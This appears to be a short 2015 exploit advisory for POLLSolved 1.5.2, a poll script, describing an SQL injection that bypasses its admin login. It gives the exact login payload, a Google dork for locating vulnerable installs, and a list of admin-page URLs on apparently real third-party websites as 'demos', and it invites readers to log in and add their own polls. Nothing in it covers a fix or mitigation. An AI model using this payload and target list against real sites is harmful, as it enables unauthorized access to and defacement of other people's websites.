POLLSolved 1.5.2 SQL Injection / Authentication Bypass
Posted on 14 November 2015
###################### # Exploit Title : POLLSolved Authentication Bypass # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.usolved.net/ # Google Dork : intitle:POLLSolved # Date: 2015/11/12 # Version : v1.5.2 # ###################### # PoC: #To bypass the login page enter '=' 'or' for username and password input. #Login And Add Your Poll D: # # #Demo: #http://kleckserupload.squXare7.ch/pollsolved/admin.php #http://www.swissfleckviXeh.ch/Umfrage/admin.php #http://www.harzerpanXorama.de/pool/admin.php #http://schlagerheilo.Xde/pollsolved/admin.php #http://www.ccbsayXit.com/pollsolved/admin.php #http://www.woodXforsims.de/Upoll/admin.php #www.smital.at/poll/admin.php # # #And Replace Admin.php With Poll.php ###################### # discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) ######################